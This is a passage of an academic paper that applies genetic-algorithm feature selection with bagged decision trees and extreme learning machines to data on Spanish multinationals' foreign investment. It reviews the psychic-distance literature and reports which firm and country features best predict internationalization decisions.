enterprises. PeerJ Comput. Sci. 7:e403 DOI 10.7717/peerj-cs.403 Submitted 17 August 2020 Accepted 29 January 2021 Published 25 March 2021 Corresponding author Álvaro Herrero, ahcosio@ubu.es Academic editor Arkaitz Zubiaga Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.403 Copyright 2021 Herrero et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.403 mailto:ahcosio@�ubu.�es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.403 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Domestic Product (GDP), GDP per capita, etc., the concepts of bilateral psychic distance (Dow & Karunaratna, 2006; Johanson & Vahlne, 1977) and experience (Clarke, Tamaschke & Liesch, 2013; Jiménez et al., 2018) have a notorious influence. Due to managerial bounded rationality (Barnard & Simon, 1947), exploring the various possible configurations of variables that may play a critical impact on internationalization is a complicated task that cannot be performed efficiently. Managers in charge of their firm’s internationalization, but also policy-makers aiming to attract higher inflows of foreign investments, need to build on sophisticated tools that can extract more insightful information. To face this challenging issue, the application of Artificial Intelligence (AI) techniques has been previously proposed (Herrero & Jiménez, 2019). A wide variety of AI techniques has been previously applied, ranging from Artificial Neural Networks (Hsu & Huang, 2018; Contreras, Manzanedo & Herrero, 2019) to Particle Swarm Optimization (Simić et al., 2019). In the present paper, a combination of Machine Learning methods is proposed. Differentiating from previous work where unsupervised learning is proposed (Herrero, Jiménez & Bayraktar, 2019), in the present paper Feature Selection (FS) (John, Kohavi & Pfleger, 1994) is proposed in order to identify the subset of features that best characterize internationalization strategies of companies. To do so, advanced classifiers based on Bagged Decision Trees (BDTs) and Extreme Learning Machines (ELMs), are applied. These supervised-learning methods are used to model the fitness function of a FS schema, where an evolutionary algorithm is applied in order to generate different combinations of features in order to predict the internationalization decision of companies with high accuracy. Furthermore, obtained results are also compared with those from other Machine Learning methods that have been previously applied (Jiménez & Herrero, 2019) to the same dataset. Similar, yet different, solutions comprising genetic FS have also been proposed for problems in other fields such as health (Salcedo-Sanz et al., 2004; Maleki, Zeinali & Niaki, 2021), Bio-informatics (Chiesa et al., 2020) or credit rating (Jadhav, He & Jenkins, 2018) among others. Artificial Intelligence methods have been previously applied to FS (Saad, 2008); although they are one of the newest proposals in the field of neural networks, ELMs have been previously applied as classifiers under the frame of evolutionary FS, since the seminal work was published (Meng-Yao et al., 2012). FS based on both basic ELM and Optimally Pruned ELM was applied in Termenon et al. (2013) and Chyzhyk, Savio & Graña (2014), where the data features were extracted from brain magnetic resonance imaging. In Termenon et al. (2013) the ELM-based FS was applied under the frame of an image biomarker identification system for cocaine dependance, while in Chyzhyk, Savio & Graña (2014) it was applied to better diagnose patients suffering from Alzheimer’s Disease. Results were compared to those obtained by Support Vector Machines, k-Nearest Neighbour, Learning Vector Quantization, Relevant Vector Machines, and Dendritic Computing. In Xue, Yao & Wu (2018) a variant of ELMs called Error-Minimized ELM (EM-ELM) is applied to measure the quality of each one of the subsets of features generated by a genetic Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 2/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ algorithm. The proposed FS method is compared to some other Machine Learning methods that do only include one (C4.5) basic decision tree. Furthermore, results are obtained from 10 benchmark datasets, none of them from the economics domain. In Wang et al. (2018), ELMs have been proposed for FS once again, but combined with Particle Swarm Optimization, for regression. Although the Bootstrap Aggregation (Bagging) of decision trees has been also applied to FS (Panthong & Srivihok, 2015), to the best of the authors knowledge, it has never been compared to ELM for this purpose. Thus, going one step forward to the previous work, two advanced FS methods are applied in the present paper to a real-life dataset on company internationalization and their results are compared to those previously obtained by some other FS methods. The internationalization of companies has been previously researched by Machine Learning methods; in Rustam, Yaurita & Segovia-Vergas (2018) a dataset of 595 Spanish firms is analyzed by Support Vector Machines (SVMs) in order to predict the success of internationalization procedures. That is, SVMs are applied in order to differentiate between successful and failed internationalization of manufacturing companies. Differentiating from this previous work, the present paper proposes advanced FS to gain deep knowledge about the key features that are considered by companies in order to invest in a foreign country. The addressed topic of internationalization is explained in “Literature Review”, while the Machine Learning methods proposed and applied are described in “Materials and Methods”. Obtained results are compiled and discussed in “Results and Discussion” and the conclusions derived from them are presented in “Conclusions”. LITERATURE REVIEW The internationalization of firms is a complex managerial problem in which multiple factors need to be accounted for. As previously mentioned, both company-level and country-level characteristics can have a significant influence. Companies will find a very different environment depending which country invest and, conversely, a given host country will present different opportunities and threats to companies depending on the firms‘ specific resources and capabilities. Accordingly, both levels, company and country, need not to be overlooked. Among the various determinants of the location choice of multinational enterprises, two constructs have been recently highlighted by scholars given their significance. Thus, recent studies have shown that experience (Padmanabhan & Cho, 1999), at the company-level, and bilateral psychic distance (Clavel San Emeterio et al., 2018; Håkanson et al., 2016; Nordman & Tolstoy, 2014; Yildiz & Fey, 2016), at the country one, are particularly important for the majority of Multinational Enterprises (MNEs). Furthermore, international business scholars have called for further attention to the multi-dimensional nature of these constructs, warning against the classic and somewhat simplistic perspective taken in many studies in which a single dimension is analyzed and supposed to capture the full effect (Dow & Karunaratna, 2006; Jiménez et al., 2018; Berry, Guillén & Zhou, 2010; Pankaj, 2001; Puthusserry, Child & Rodrigues, 2014). Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 3/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ Thus, in the early studies on international trade and investment, distance between countries (home and host) was uniquely conceptualized in terms of geography, building on the so-called “gravity model” (Tinbergen & Hekscher, 1962; Kleinert & Toubal, 2010). Shortly after, scholars added the effect of cultural distance (Hofstede, Hofstede & Minkov, 2010; Kogut & Singh, 1988; Barkema, Bell & Pennings, 1996). Despite the improvement and success of studies incorporating the effect of cultural distance, recent advances in the field have shown that the true determinant of the location choice is the concept of psychic distance (Tung & Verbeke, 2010), which is a broader construct encompassing cultural distance (Dow & Karunaratna, 2006). The concept of psychic distance was popularized by the Uppsala School (Johanson & Vahlne, 1977, 1990; Johanson & Wiedersheim-Paul, 1975; Vahlne & Johanson, 2017; Nordstrom & Vahlne, 1990; Vahlne & Nordström, 1992) and it is typically defined as “the sum of factors preventing the flow of information from and to the market. Examples are differences in language, education, business practices, culture, and industrial development” (Johanson & Vahlne, 1977). Nordstrom & Vahlne (1990) further develop the concept by emphasizing learning and understanding the foreign market instead of simply accessing the information. Originally, thus, the emphasis of this literature stream was on the link between great psychic distance and the liability of foreignness, but recent extensions of the model have started to emphasize also how psychic distance also affects the establishment of relationships, and the evolution of other aspects such as R&D, and organizational and strategic change processes (Johanson & Vahlne, 2009; Vahlne & Johanson, 2017; Brewer, 2007). Psychic distance has been shown to be significant for various firm-related outcomes such as FDI location (Ojala & Tyrväinen, 2009; Blomkvist & Drogendijk, 2013; Magnani, Zucchella & Floriani, 2018), subsidiary performance (Dikova, 2009), entry mode (Dow & Larimo, 2009; Dow & Ferencikova, 2010), ownership in acquisitions (Chikhouni, Edwards & Farashahi, 2017), innovation (Azar & Drogendijk, 2014) or export and trade (Klein & Roth, 1990). We present in Table 1 a review of these empirical studies on psychic distance. As it can be observed from Table 1, all of the works employ traditional, deductive statistical estimation techniques. As Choudhury, Allen & Endres (2021) highlight, Machine Learning techniques, drawing on abductive and inductive research, offer a complementary perspective that permits the observation and identification of data patterns that other techniques, such as the classic deductive regressions, can overlook due to their constraints to fit the data into pre-determined models. We precisely aim to adopt such perspective to assess the relevance of diverse firm-level and country-level factors in order to contribute to the study of firm internationalization. Psychic distance comprises both the individual perceptions of distance of a given individual, shaped by the macro-level factors that form those perceptions (Dow & Karunaratna, 2006; Brewer, 2007; Dow & Ferencikova, 2010; Ambos, Leicht-Deobald & Leinemann, 2019; Bhowmick, 2019). We follow one of the most influential frameworks of psychic distance proposed in the literature, the one by Dow & Karunaratna (2006) published in the leading International Business journal (Journal of International Business Studies), in which six different dimensions (called stimuli) are proposed. Specifically, these Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 4/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ Table 1 Synthesis of the literature on psychic distance. Author Year Sample and estimation technique Scope of the article Klein & Roth 1990 477 firms in Canada (multinomial logit model) The authors analyze the impact of experience and psychic distance as predictors of export decision, differentiating between conditions of high vs low asset specificity Dow & Karunaratna 2006 627 country pairs trade flows among a set of 38 nations (multiple regression model) The authors develop and test psychic distance stimuli including differences in culture, language, religion, education, and political systems. They find that these measures are better predictor than a composite measure of Hofstede’s cultural dimensions Chikhouni, Edwards, & Farashahi 2007 25,440 full and partial acquisitions from 25 countries (Tobit regression) The authors find that the direction of distance moderates the relationship between distance and ownership in cross-border acquisitions. Besides, they also find significant differences when the acquisition is made by an emerging country multinational compared to when it is made by a developed country one Dikova 2009 208 foreign direct investments made in Central and Eastern Europe (ordinary least-squares regression) The author obtains empirical evidence supporting a positive relationship between psychic distance and subsidiary performance in the absence of market specific knowledge. However, psychic distance has no effect on subsidiary performance when the firm has prior experience in the region or when it has established the subsidiary with a local partner Dow & Larimo 2009 1,502 investments made by 247 firms in 50 host countries (binary logistic regression) The authors argue that a more sophisticated conceptualization and operationalization of the concepts of distance and international experience increases the ability to predict entry mode, the lack of which is the reason for ambiguous results in previous research Ojala & Tyrvainen 2009 165 Finnish small and medium firms (stepwise multivariable linear regression) The authors examine the relevance of cultural/psychic distance, geographical distance, and several aspects related to market size as predictors of the target country preference of SMEs in the software industry Prime, Obadia, & Vida. 2009 8 French manufacturing firms (qualitative study) The authors critically review the concept of psychic distance and contend that the inconsistent results in previous literature are due to weaknesses in its conceptualization, operationalization, and measurement. Building on their grounded theory-based qualitative study with export managers in French manufacturing companies, the authors propose that psychic distance stimuli should cultural issues (i.e., patterns of thought, behaviors, and language prevailing in the foreign markets) and issues pertaining to the business environment and practices (i.e., relationships with businessmen; the differences in business practices; and the local economic, political, and legal environment) Dow & Ferencikova 2010 154 FDI ventures in Slovakia from 87 potential home countries (logistic regression and multiplevariable linear regression). In this paper the authors employ psychic distance stimuli to analyze FDI market selection, entry mode choice and performance. The find strong empirical support for a significant effect of psychic distance on both market selection and FDI performance, but the results for entry mode choice are ambiguous Blomkvist & Drogendijk 2013 Chinese outward FDI (ordinary least squares regression) The authors analyze how psychic distance stimuli in language, religion, culture, economic development, political systems, education, plus geographic distance affect Chinese OFDI and find that aggregated psychic distance and certain individual stimuli are significant predictors Azar & Drogendijk 2014 186 export ventures into 23 international markets by Swedish companies (structural equation models) The authors show that psychic distance has a positive effect on innovation. Firms that perceived a high level of differences in psychically distant markets are more likely to introduce technological and organizational innovations in order to reduce uncertainty. Furthermore, they also find that innovation mediates the relationship between psychic distance and firm performance (Continued) Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 5/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ authors posit that the individual perceptions of psychic distance are shaped by the country differences in education, industrial development, language, democracy, social system, and religion. Finally, at the company level, we also rely on recent advances in the literature in which studies have shown that the role of experience is much more complex than initially thought (Clarke, Tamaschke & Liesch, 2013). Thus, scholars have shown the great influence of the knowledge that firms can obtain from the experience of other firms (Jiang, Holburn & Beamish, 2014). Drawing on Organizational Learning Theory (Cyert & March, 1963; Huber, 1991; Levitt & March, 1988), companies are able to observe the behavior of other companies and obtain valuable information for their own strategy formulation and implementation by learning from best practices and mistakes and establishing collaborations (Argote, Beckman & Epple, 1990; Lieberman & Asaba, 2006; Terlaak & Gong, 2008). Especially when other firms share a key characteristic with the focal company (for example the country of origin or the industry to which they belong (Jiménez & De la Fuente, 2016)), their previous actions represent a valuable source of information about expected challenges and opportunities, good and bad practices and networking opportunities (Terlaak & Gong, 2008; Meyer & Nguyen, 2005). Overall, a correct internationalization strategy is complicated and elusive given the multitude of factors playing a role and their multi-dimensional nature, which calls for further examination of their particular importance. A finer-grained analysis of the determinants of FDI location by multinational companies can provide insightful information to prospective managers who need to make critical decisions that can determine the success, performance, viability and even survival of their enterprises. Table 1 (continued) Author Year Sample and estimation technique Scope of the article Puthusserry, Child, & Rodrigues 2015 30 British SMEs and their 30 Indian partner SMEs in international business (qualitative methodology) The authors investigate inter-partner perceptions of psychic distance between Britain and India, examining different dimensions of psychic distance, their impact and modes of coping with them. They find that culturally embedded psychic distance dimensions tend to have less impact and to be easier to cope with than institutionally embedded dimensions and identify four coping mechanisms Magnani, Zucchella, & Floriani 2018 Multiple case study methodology (Italy and Brazil). The authors analyze the role of firm-specific strategic objectives as determinants of foreign market selection together with objective distance and psychic distance Ambos, Leicht- Deobald, & leinemann 2019 1591 managers located in 25 countries (hierarchical linear modeling) The authors analyze the formation of psychic distance perception and find that that country-specific international experience, formal education, and the use of common language reduce psychic distance perceptions. In contrast, international experience and overall work experience do not have a significant effect. Besides, they find that individual-level antecedents have lower explanatory level compared to country-level ones Dinner, Kushwaha, & Steenkamp 2019 217 firms based in 19 countries (event study methodology) The authors investigate the role pf psychic distance when multinational enterprises face foreign marketing crises. They find that the relationship between psychic distance and firm performance during marketing crises has a curvilinear shape and that marketing capabilities moderate this relationship Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 6/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ MATERIALS AND METHODS The present work aims at obtaining the most relevant features from enterprise-country data that will provide enterprise managers with the information to take decisions on internationalization. In this paper we employ a sample of firms coming from two sources belonging to the Spanish Ministry of Industry, Tourism, and Trade and the website of the Foreign Trade Institute (ICEX) (ICEX Spain Import and Investments, 2020). We compiled a sample of independent multinational firms operating in overseas markets by conducting FDI operations. Since small and medium firms have distinct capabilities and face specific challenges in terms of access to funding to internationalize, we focus on large firms and follow the well-established criterion of having 250 employes at least (Jiménez, 2010). We also focus on investments before 2007 to prevent distortions in the results due to the impact of the subsequent financial crisis (Jiménez et al., 2018). Following previous studies on the internationalization of Spanish multinationals, we collected the following variables for each foreign subsidiary of the companies in our sample: � Characteristics from host country such as unemployment, total inward FDI, GDP, growth, and population. � Bilateral geographic distance as measured in the CEPII database (Centre d’Études Prospectives et d’Informations Internationales (CEPII), 2020). � Psychic distance stimuli between countries. We include all 6 dimensions identified by Dow & Karunaratna (2006): education, industrial development, language, democracy, political ideology, and religion. The first one, education, measures the differences on education enrollment and literacy between the two countries building on data from the United Nations. The second one, industrial development, is the principal component result of ten factors including differences in the consumption of energy, vehicle ownership, employment in agriculture, the number of telephones and televisions, etc. The third one, language, measures the genealogical distance between the dominant languages in the countries and the percentage of population in each country speaking the language of the other. The fourth one, democracy, is based on the similarities in terms of political institutions, civil liberties, and the POLCON and POLITY IV indices. The fifth one, political ideology, measures the differences in the ideologies of the executive powers in each country. Finally, the sixth one, religion, measures the differences in terms of the predominant religion between the countries and the percentage of followers of that religion on the other country. Comprehensive data for all the variables across the majority of countries in the world can be found at (Dow, 2020). Similarly, a more detailed description of the procedure to calculate the various psychic distance dimensions can be found at that website and at the seminal paper by Dow & Karunaratna (2006). � Vicarious experience: Following the previous literature on vicarious experience (Jiménez & De la Fuente, 2016; Jiang, Sui & Cao, 2013) we employ the total count of other Spanish MNEs present in the host country as our measure of vicarious experience. We distinguish between same-sector vicarious experience (total count of other Spanish Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 7/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ MNEs in the host country belonging to the same sector), different-sector vicarious experience (total count of other Spanish MNEs in the host country belonging to a different sector) and total vicarious experience (the addition of same-sector and different-sector vicarious experience). � Firm product diversification: we distinguish between three alternatives, namely related product diversification, unrelated product diversification, and single-product firms (Ramanujam & Varadarajan, 1989; Kumar, 2009). � Industry: we identify five main groups including manufacturing, food, construction, regulated, and unclassified sectors. � Other firm characteristics: Return on Equity, number of countries where the firm operates, Number of employes, and whether or not the firm is included in a stock market. All in all, data from 10,004 samples, compressing 25 features, were collected. Features from countries are: 1. Geographic Distance (Log) 2. Psychic Distance—Education 3. Psychic Distance—Industrial Development 4. Psychic Distance—Language 5. Psychic Distance—Democracy 6. Psychic Distance—Social System 7. Psychic Distance—Religion 8. Unemployment 9. FDI/GDP 10. GDP Growth 11. Population (Log) Features from companies themselves are: 1. Vicarious Experience 2. Vicarious Experience Same Sector 3. Vicarious Experience Different Sector 4. Manufacturing 5. Food 6. Construction 7. Regulated 8. Financial 9. Employees 10. ROE 11. Stock Market Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 8/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ 12. Related Diversification 13. Unrelated Diversification 14. Number of Countries General statistics about the dataset under study are shown in Table 2. Obtaining knowledge about decision making regarding the internationalization of companies is a challenging task that perfectly suits Feature Selection (FS). There are mainly two methods from the Machine Learning field that are able to identify the key characteristics of a given dataset. Feature extraction is one of the alternatives, but it is not suitable for the present work as it generates new features from the dataset that are not in the original data. In the present work, the target is to select some of the features from the original dataset as conclusions can be generalized and obtained knowledge applied to other problems (i.e., set of companies). Thus, feature selection is the most appropriate method in the present study. Hence, some advanced FS proposals are applied in the present research with the aim of identifying the key characteristics that lead to positive or negative internationalization decisions. In general terms, FS consists of a learning algorithm and an induction algorithm. The learning algorithm chooses certain features (from the original set) upon which it can focus its attention (John, Kohavi & Pfleger, 1994). Only those features identified as the most relevant ones are then selected, while the remaining ones are discarded. Additionally, there is also an induction algorithm that is trained on different combinations of features (from the original dataset) and aimed at minimizing the classification error from the given features. Building on Choudhury, Allen & Endres (2021), supervised Machine Learning is applied in the present work as the induction algorithm. Under the frame of FS, for every original feature, two different levels of relevance (weak and strong) can be defined (Kohavi & John, 1997). A feature is assigned a strong-relevance level if the error rate obtained by the induction algorithm increases significantly and a weak-relevance level is assigned otherwise. In keeping with this idea, strong-relevance features are to be selected from the internationalization dataset in order to know which ones are the most important ones when taking internationalization decisions. There are three different ways of coordinating the learning and induction algorithms: embedded, filter and wrapper. The wrapper scheme (Kohavi & John, 1997) has been applied in the present work, being the induction algorithm wrapped by the learning algorithm. That is, the induction algorithm can be considered as a “black box” that is applied to the different combinations of original features that are generated. This perfectly suits the addressed problem because the internationalization decision can be modeled as the target class, being a binary classification problem. As a consequence, well-known and high-performance binary classifiers can be used as induction algorithms. Additionally, the selection of features done by the different induction algorithms can be compared and interesting conclusions from the management perspective can be derived. Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 9/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ According to that, different classifiers have been applied as induction algorithms in order to predict the class of the data. In the present paper, both Bagged Decision Trees and Extreme Learning Machines are applied. Furthermore, results obtained by these two methods are compared to those previously generated (Jiménez & Herrero, 2019) by Random Forest (RF) and SVM on the very same dataset. The classifiers are fed with datasets containing the same data instances as in the original dataset but comprising a reduced number of features. In order to generate different combinations of them, standard Genetic Algorithms (GAs) (Goldberg, 1989) have been applied in the present paper. The main reason for choosing such approach is that, when dealing with big datasets, it is a powerful mean of reducing the time for finding near- optimal subsets of features (Siedlecki & Sklansky, 1989). When modeling the problem under this perspective, the different solutions to be considered (selected features, in the present research) are codified as n-dimensional binary vectors, being n the total number of features in the original dataset. In a FS problem, a value of 0 is assigned to a given feature if it is not present in the feature subset and 1 Table 2 Descriptive statistics about the analyzed dataset. Feature Max Min Mean Std. Dev. Geographic Distance (Log) 4.29 2.83 3.59 0.37 Psychic Distance—Education 2.78 0.10 1.17 0.61 Psychic Distance—Industrial Development 1.34 0.00 0.59 0.34 Psychic Distance—Language 0.53 −3.87 −0.52 1.53 Psychic Distance—Democracy 1.89 0.00 0.37 0.44 Psychic Distance—Social System 0.67 0.00 0.36 0.23 Psychic Distance—Religion 1.28 −1.55 −0.85 0.91 Unemployment 23.80 1.30 7.85 4.10 FDI/GDP 20.75 −11.28 3.89 4.50 GDP Growth 10.60 −3.56 4.59 2.80 Population (Log) 9.12 5.47 7.23 0.75 Vicarious Experience 102.00 2.00 24.74 22.50 Vicarious Experience Same Sector 38.00 0.00 6.30 7.90 Vicarious Experience Different Sector 94.00 0.00 18.44 18.05 Manufacturing 1.00 0.00 0.37 0.48 Food 1.00 0.00 0.12 0.32 Construction 1.00 0.00 0.12 0.32 Regulated 1.00 0.00 0.08 0.27 Financial 1.00 0.00 0.09 0.28 Employees 5.21 2.30 3.33 0.65 ROE 77.50 −104.45 15.09 17.15 Stock Market 1.00 0.00 0.37 0.48 Related Diversification 1.00 0.00 0.53 0.50 Unrelated Diversification 1.00 0.00 0.15 0.35 Number of Countries 89.00 1.00 11.20 12.88 Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 10/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ otherwise. Once representation of solutions is defined, the GA (as defined in Fig. 1 below) is applied. In standard GAs, two operators (mutation and crossover) are usually applied depending on a previously stated probability (experimentation has been carried out with different values as explained in “Results and Discussion”). Additionally, when modeling a GA Figure 1 Flowchart of a standard genetic algorithm for wrapper feature selection. Full-size DOI: 10.7717/peerj-cs.403/fig-1 Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 11/26 http://dx.doi.org/10.7717/peerj-cs.403/fig-1 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ (Kramer, 2017), the fitness function is also defined, as the criteria to measure the “goodness” of a given solution, that is its quality. In the case of FS, the fitness function is usually defined as the misclassification rate of the classifier when applied to the dataset compressing the features in the solution to be evaluated. As a result, the best solution is selected, being the one with the lowest value calculated with the fitness function. That is, the combination of features that led the given classifier to get the lowest error when being tested. As previously mentioned, some different classifiers have been applied, being the novel ones described below. Decision trees (DTs) (Safavian & Landgrebe, 1991) are one of the most popular Machine-Learning methods. They have been successfully applied, proving to be valuable tools for different tasks such as classification, generalization, and description of data (Sreerama, 1998). Being trees, they are composed of nodes and arches, as shown in Fig 2. Nodes in a DT can be of two different types; internal and leaf. The first ones are those aimed at differentiating responses (branches) for a given question. In order to address it, the tree takes into account the original training dataset; more precisely, the values of a certain feature. On the other hand, leaf nodes are associated to the final decision (class prediction) and hence they are assigned a class label. All internal nodes have at least two child nodes and when all of them have two child nodes, the tree is binary. Both parent/child arches and leaf nodes are connected: the first ones are labeled according to the responses to the node question and the second ones according to the classes or the forecast value. In the present research, performance of DTs is improved by a Booststrap (Efron & Tibshirani, 1994) Aggregation (Bagging) strategy, resulting in a Bagged DT (BDT). Within this tree ensemble, every tree is grown on an independently drawn bootstrap subset of the data. Those data that are not included in this training subset are considered to be “out of bag” (OOB) for this tree. The OOB error rate is calculated in order to validate the BDT for each individual (subset of features). For such calculation, training data are not used but those OOB data instances instead. Figure 2 Sample structure of a decision tree. Full-size DOI: 10.7717/peerj-cs.403/fig-2 Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 12/26 http://dx.doi.org/10.7717/peerj-cs.403/fig-2 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ In order to speed up the training of Feedforward Neural Networks (FFNN), Extreme Learning Machines (ELMs) were proposed (Huang, Zhu & Siew, 2006). These neural nets can be depicted as: The functioning of such network can be mathematically expressed as: Xm i¼1 bigi xj � � ¼ Xm i¼1 big wi � xj þ bi � � ¼ oj; j ¼ 1; : : :; N; (1) being xj the jth input data, m the number of hidden nodes (3 in Fig. 3), wi the weight vector connecting the input and hidden nodes, bi the weight vector connecting the hidden and output nodes, bi the bias of the ith node, giðÞ the activation function of the ith hidden node, and oj the output of the net for the jth input data. The ELM training algorithm is pretty simple and consists of the following steps: � Assign arbitrary input weights (wi) and bias (bi). � Calculate the hidden layer output by applying the activation function on the weighted product of input values. � Calculate the output weights (bi). To reduce training time, ELMs are designed as single-hidden layer nets which analytically determine the output weights and randomly choose their hidden nodes. The main consequence of this is that learning speed can be thousands of times faster than traditional FFNN training algorithms like the well-known back-propagation. Unlike the well-known training algorithms based on gradient-based (they try to minimize training error without considering the magnitude of weights), the ELM training algorithm reaches the smallest training error and norm of weights, at the same time. As a side effect, the model also has a good generalization performance and is consequently considered an advisable learning model (for both classification and regression) mainly in those applications when many training processes have to be launched (as in the present case of evolutionary FS). Figure 3 Sample topology of an ELM. Full-size DOI: 10.7717/peerj-cs.403/fig-3 Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 13/26 http://dx.doi.org/10.7717/peerj-cs.403/fig-3 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ It is widely acknowledged that one of the main disadvantages of FFNN is that all the parameters need to be tuned. In the case of ELMs, both the hidden layer biases and input weights are randomly assigned, obtaining acceptable error rates. All the methods previously described in this section have been implemented and run on MATLAB software. For the ELMs the original MATLAB implementation (Extreme Learning Machines, 2020) has been adapted to the FS framework. RESULTS AND DISCUSSION As previously explained, a standard GA has been applied to optimize the search of best features subsets. Its most usual parameters were tuned in 81 different combinations, taking the following values: � Population Size: 10, 20, 30. � Number of Generations: 10, 15, 20. � Mutation Probability: 0.033, 0.06, 0.1. � Crossover Probability: 0.3, 0.6, 0.9. � Selection Scheme: Tournament. To get more reliable results, the same combination of values for the parameters above have been used to run the genetic algorithm 10 times (iterations). As stated in “Materials and Methods”, the misclassification rate of the classifier has been used as the fitness function to select the best solutions (subset of features). According to the given values of such function, in each experiment the feature subset with the lowest error rate has been selected. Results are shown in this section for the two classifiers that are applied for the first time (BDT and ELM), as well as those for the two previous ones: SVM and RF (Jiménez & Herrero, 2019), to ease comparison. The GA parameter values and the misclassification rate (error) of the best individuals for each one of the classifiers are shown in Table 3. Additionally, for BDTs, 10 trees were built in each iteration and in the case of ELMs, both sigmoidal and sinusoidal functions have been benchmarked as activation functions of the hidden nodes. A varying number of such nodes has been tested as well for each experiment, including 5, 15, 30, 60, 100, 150, and 200 units. Table 3 Parameters values of the GA and misclassification rate associated to the best individual for each classifier. Parameter Set values SVM RF BDT ELM Population Size 30 20 30 30 Number of Generations 20 10 20 20 Mutation Probability 0.033 0.1 0.033 0.1 Crossover Probability 0.9 0.9 0.9 0.6 Misclassification rate 0.114 0.109 0.108 0.099 Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 14/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ In the case of BDTs, the best individual (misclassification rate of 0.108) comprises the following features: “Vicarious Experience Same Sector”, “Manufacturing”, “Food”, “Construction”, “Unrelated Diversification”, and “Number of Countries”. In the case of ELMs, the best individual (misclassification rate of 0.099) can be considered as very robust as it was the best one obtained with both sigmoidal (ELM—sig) and sinusoidal (ELM—sin) output functions and a high number of output neurons (150 and 200 respectively). The one obtained with the sigmoidal function comprises the following ones: “Vicarious Experience Same Sector”, “Manufacturing”, “Food”, “Construction”, “Regulated”, “Financial”, “Employees”, “Unrelated Diversification”, and “Number of Countries”. In the case of the sinusoidal function (ELM—sin), the following features define the best individual: “Vicarious Experience Same Sector”, “Manufacturing”, “Food”, “Construction”, “Regulated”, “Financial”, “Psychic Distance—Language”, “ROE”, and “Number of Countries”. Best individuals obtained by BDT and ELM share the following features: “Vicarious Experience Same Sector”, “Manufacturing”, “Food”, “Construction”, “Financial”, and “Number of Countries”. When considering the 4 classifiers, the following features are included in all the best individuals “Manufacturing”, “Food”, and “Number of Countries”. On the contrary, “Psychic Distance – Education” and “Unemployment” have not been included in any of the best individuals. The number of features in the best individuals obtained in the different searches, and the average number of features in the best individuals obtained in all the (10) iterations for the same parameters are shown in Table 4. For further study of the obtained results on advanced feature selection, Fig. 4 shows a boxplot comprising the following information related to the 10 iterations with the combination of parameter values that has generated the best individual in each case. Comprised information includes: mean error, standard deviation error, error of the best individual, and number of features. From the enterprise management perspective, these results demonstrate the critical importance of vicarious experience, sector, and degree of internationalization as measured by the number of countries where the MNE runs operations. Product diversification, number of employes, and some dimensions of psychic distance are also relevant as they appear in multiple best individuals. However, the results also underline that it is important to disentangle these constructs into their different components, as not all of them are equally important. Thus, the results show that the most critical variable is vicarious experience from other firms in the same sector, but not the one from firms in different Table 4 Number of features in the best individuals for the different classifiers. Classifier Number of features Best individual Mean SVM 11 13.1 RF 17 15.7 BDT 7 11.8 ELM 9 8.8 Herrero et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.403 15/26 http://dx.doi.org/10.7717/peerj-cs.403 https://peerj.com/computer-science/ sectors. This idea is in line with those of Jiang, Holburn & Beamish (2014) where it was shown that firms find vicarious experience from other firms in the same sector much more relevant, valuable, and easier to assimilate. In contrast, vicarious experience from firms in other sectors, while potentially useful (Jiménez & De la Fuente, 2016), it is much less applicable as managers will find it more difficult to assimilate and legitimize in front of other stakeholders (Guillén, 2002). Similarly, only unrelated diversification appears as relevant, but not related diversification. Further, it is worth noting that only one dimension of psychic distance (i.e., in language) appears as relevant. Among the multiple dimensions, our findings emphasize the importance of communication and the prevention of misunderstandings with other agents in the markets such as customers, suppliers or governments. This result is consistent with recent studies emphasizing the importance of language distance in international business (Dow, Cuypers & Ertug, 2016; Jimenez, Holmqvist & Jimenez, 2019). Although the relative lack of relevance of several psychic distance stimuli is somewhat surprising given the amount of studies showing that great psychic distance is detrimental to firms, it is possible that these negative effects are offset by potential positive ones. Some authors have reported that firms devote more resources to research and planning when psychic distance is greater (Evans & Mavondo, 2002), whereas when the countries are similar, firms might be complacent and overestimate the similarities, leading to the so-called “psychic distance paradox” (O’Grady & Lane, 1996; Magnusson, Schuster & Taras, 2014). In fact, various authors consider that firms might take advantage of greater distance as a source of talent and/or knowledge not available in closer markets Figure 4 Boxplots of outputs from iterations on BDT, ELM—sig, and 